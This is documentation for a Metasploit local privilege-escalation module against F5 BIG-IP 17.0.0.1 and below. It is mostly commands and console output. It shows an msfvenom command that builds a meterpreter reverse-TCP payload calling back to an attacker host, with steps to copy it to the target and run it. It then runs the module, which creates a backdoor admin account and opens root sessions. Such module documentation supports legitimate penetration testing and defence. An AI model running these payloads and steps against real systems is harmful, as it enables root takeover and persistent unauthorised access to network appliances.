Vulnerable Application
The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be downloaded as a VMWare image for free (you have to create an account) from https://downloads.f5.com. You can register for a free 30-day trial if you like, but it's not required to test this.
Boot the VM and set an admin password by logging in with the default credentials (admin / admin). You'll need that password.
Verification Steps
Install the application
Start msfconsole
Do: Get a non-root session somehow (eg: use multi/handler / set PAYLOAD linux/x64/meterpreter_reverse_tcp then ./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf [email protected]:/tmp && ssh [email protected] /bin/bash << EOF chmod +x /tmp/testexploit.elf sudo -u apache /tmp/testexploit.elf EOF)
Do: use exploit/linux/local/f5_create_user
Do set SESSION <sessionid>
Do: run
You should get a session
Options
USERNAME / PASSWORD
The username and final password for the account. If blank, they'll be randomly generated.
CREATE_SESSION
If set (which is default), will spawn a root session. Otherwise, simply creates the account.
Scenarios
F5 Big-IP 17.0.0.1 - Create a session with random creds
First, get a non-root session however you can. You can use a multi/handler and msfvenom:
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.0.179
LHOST => 10.0.0.179
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:34140) at 2022-11-14 15:59:49 -0800
[...run the payload...]
meterpreter > getuid
Server username: apache
meterpreter > bg
msf6 exploit(multi/handler) > setg SESSION 1
SESSION => 1
To create and run the payload, in another window:
$ ./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && chmod +x testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 sudo -u apache /tmp/testexploit.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068640 bytes
Final size of elf file: 1068640 bytes
testexploit.elf
Now that we have a session, we can just run the module:
msf6 exploit(multi/handler) > use exploit/linux/local/f5_create_user
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user 7yI5vLIK / woquVd36PhcG, then change password to 9d9s83bBPwu5 when creating a session
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (40168 bytes) to 10.0.0.162
[*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.162:45254) at 2022-11-14 16:02:10 -0800
meterpreter > getuid
Server username: root
F5 Big-IP 17.0.0.1 - Create a session with set creds
Create a session as shown above, then:
msf6 exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser
USERNAME => mymsfdemouser
msf6 exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword
PASSWORD => mybigmsfdemopassword
msf6 exploit(linux/local/f5_create_user) > set VERBOSE true
VERBOSE => true
msf6 exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user mymsfdemouser / QVEE0pqM7pAd, then change password to mybigmsfdemopassword when creating a session
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (40164 bytes) to 10.0.0.162
[*] Output from su command: Password: You are required to change your password immediately (root enforced)
(current) BIG-IP password: New BIG-IP password: Retype new BIG-IP password: Changing password for mymsfdemouser.
[*] Meterpreter session 3 opened (10.0.0.179:4444 -> 10.0.0.162:49646) at 2022-11-14 16:03:04 -0800
meterpreter > getuid
Server username: root
F5 Big-IP 17.0.0.1 - Just create an account with random creds
Get a session as shown above, then:
msf6 exploit(linux/local/f5_create_user) > set CREATE_SESSION false
CREATE_SESSION => false
msf6 exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user hKjGGrlU / yRQijFQjVjqa
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
^C[*] Exploit completed, but no session was created.
F5 Big-IP 17.0.0.1 - Just create an account with set creds
Get a session as shown above, then:
msf6 exploit(linux/local/f5_create_user) > set CREATE_SESSION false
CREATE_SESSION => false
msf6 exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser2
USERNAME => mymsfdemouser2
msf6 exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword
PASSWORD => mybigmsfdemopassword
msf6 exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
^C[*] Exploit completed, but no session was created.
F5 Big-IP 17.0.0.1 - Create an account with an error
Get a session as shown above, then (we use a duplicate username):
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword
[*] Hashing the password with a pseudorandom salt
[-] mcp query returned an error message: 01020066:3: The requested user (mymsfdemouser2) already exists in partition Common. (code: 16908390)
